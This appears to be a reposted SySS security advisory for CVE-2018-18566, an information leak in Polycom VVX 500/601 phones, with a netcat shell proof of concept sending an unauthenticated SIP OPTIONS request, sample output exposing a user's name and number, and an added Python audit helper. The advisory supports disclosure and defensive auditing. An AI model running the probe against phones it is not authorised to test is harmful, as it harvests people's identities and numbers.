Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability
Product: VVX 500 / VVX 601
Manufacturer: Polycom
Affected Version(s): <= 5.8.0.12848
Tested Version(s): 5.4.0.10182, 5.8.0.12848
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2018-08-29
Solution Date: 20??-??-??
Public Disclosure: 2018-10-23
CVE Reference: CVE-2018-18566
Authors of Advisory: Micha Borrmann (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Script getdatafrompolycom.sh
#!/bin/sh
# Micha Borrmann <[email protected]>
# IPv4 address of the host running this script (placed in the Via/To headers)
OWNIP=192.168.100.102
if [ -z "$1" ]
then
    echo "Please enter an IPv4 address as target"
    exit 1
else
    TARGET=$1
fi
# Send a single unauthenticated SIP OPTIONS request over TCP; recode converts
# the line endings to CRLF as SIP requires, netcat prints the phone's reply
echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 "$TARGET" 5060
Start the script against a phone and see the result:
$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0
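Added example, not part of the SySS advisory or its PoC: a small Python audit helper that parses a captured 200 OK like the one above, checks whether the User-Agent firmware version falls in the affected range (<= 5.8.0.12848) and lists the identity fields the phone exposed, so an inventory scan can show which handsets still answer unauthenticated OPTIONS with configuration data. The embedded response, including its name, SIP URI and number, is a constructed placeholder.

```python
import re

# Constructed sample modelled on the advisory's 200 OK (not a real capture);
# the name, SIP URI and number are placeholders.
SAMPLE_RESPONSE = (
    "SIP/2.0 200 OK\r\n"
    'To: "Jane Doe" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE\r\n'
    "CSeq: 1 OPTIONS\r\n"
    "User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848\r\n"
    'P-Preferred-Identity: "Jane Doe" <sip:jane.doe@example.com>,'
    "<tel:+491234567890;ext=1234>\r\n"
    "Content-Length: 0\r\n\r\n"
)
AFFECTED_MAX = (5, 8, 0, 12848)  # advisory: affected versions <= 5.8.0.12848
LEAK_PATTERNS = {  # identity fields to look for in P-Preferred-Identity (or To)
    "display_name": r'"([^"]*)"', "sip_uri": r"<sip:([^>;]+)", "phone_number": r"<tel:([^;>]+)"}

def parse_headers(raw):
    """Return (status line, {lower-cased name: value}); repeated headers are joined with commas."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # not a header line
        name, value = line.split(":", 1)
        key, value = name.strip().lower(), value.strip()
        headers[key] = headers[key] + "," + value if key in headers else value
    return lines[0], headers

def firmware_version(user_agent):
    """Extract the UC Software version from 'Polycom/a.b.c.d ...' as an int tuple."""
    m = re.search(r"Polycom/(\d+)\.(\d+)\.(\d+)\.(\d+)", user_agent)
    return tuple(int(x) for x in m.groups()) if m else None

def audit_options_response(raw):
    """Report firmware (and whether it is affected) plus identity fields exposed to an OPTIONS probe."""
    status, h = parse_headers(raw)
    report = {"status": status, "firmware": None, "affected_firmware": False, "leaked": {}}
    if not status.startswith("SIP/2.0 200"):
        return report  # the phone did not answer the probe with 200 OK
    ver = firmware_version(h.get("user-agent", ""))
    report["firmware"] = ver
    report["affected_firmware"] = ver is not None and ver <= AFFECTED_MAX
    ident = h.get("p-preferred-identity") or h.get("to", "")
    for field, pattern in LEAK_PATTERNS.items():
        m = re.search(pattern, ident)
        if m:
            report["leaked"][field] = m.group(1)
    return report
```

A phone patched per the Solution section should not answer on TCP 5060 at all, so a connection failure is the expected result there; a 200 OK with identity fields means the handset still needs attention.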
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
Install the new firmware, which disables the SIP service by default.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product web sites for the phones
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
# 0day.today [2018-10-25] #